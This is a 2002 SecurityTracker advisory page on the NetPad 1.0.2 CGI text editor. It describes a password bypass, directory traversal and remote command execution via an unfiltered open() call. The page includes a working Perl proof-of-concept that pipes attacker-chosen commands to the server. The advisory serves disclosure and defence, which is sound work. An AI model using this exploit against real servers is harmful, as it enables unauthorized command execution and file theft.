SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   NetPad Vendors:   Levcgi.com
NetPad Text Editing CGI Script Input Validation Flaws Let Remote Users View Files and Execute Shell Commands
SecurityTracker Alert ID:  1004288
SecurityTracker URL:  http://securitytracker.com/id/1004288
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 14 2002
Impact:   Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.0.2
Description:   A vulnerability was reported in LevCgi.com's NetPad web-based text editor. A remote user can view files on the server and execute shell commands on the system.

b0iler and BrainRawt reported several input validation several vulnerabilities in the NetPad CGI script.

A remote user can supply directory traversal strings ('../') to change directories and view any file that is readable by the web server.

A remote user can execute commands on the server due to the lack of filtering on user-supplied input that is passed to an open() function call. A demonstration exploit for this vulnerability is provided in the Source Message.

The password security feature is apparently not required to be able to read files, only to write files, which may be counter to the vendor's description of the feature.

The vendor has reportedly been notified.

Impact:   A remote user can view files located anywhere on the partition that are readable by the web server. A remote user can execute arbitrary commands with the privileges of the web server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.levcgi.com/programs.cgi?program=netpad (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  LevCGI.coms NetPad 1.0.2 multiple vulnerabilities



Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler(b0iler@hotmail.com) and 
BrainRawt(brainrawt@hotmail.com)

About Netpad:
------------------
<quote from levcgi.com>

Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely effecient and a must have tool for all
webmasters!

</quote from levcgi.com>

According to the website,  ...NetPad has been downloaded 1225 times!


Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2


Vendor Contact:
----------------
4-28-02 - Emailed lev@taintedthoughts.com


Vulnerabilities:

-- Password Bypass

1. The website claims "password security feature to prevent unauthorized 
access!",
    but this is NOT true.

    A password is not required to read files.  It is only required to write 
to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional 
"../../../" into
    the input field to crawl back through directories of the server hosting 
netpad.cgi,
    allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is 
possible
    for a malicious visitor to remotely execute commands on the server 
hosting
    netpad.cgi

    Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):
---------------------------------------

#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and alittle effort.
#
# requires LWP avaliable at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi 
../../../../bin/command

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);

my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");

my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have 
worked.\n"; }
else {  print "request failed.\n"; }

Fix:
------

No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? - 
BrainRawt


_________________________________________________________________
Send and receive Hotmail on your mobile device: http://mobile.msn.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC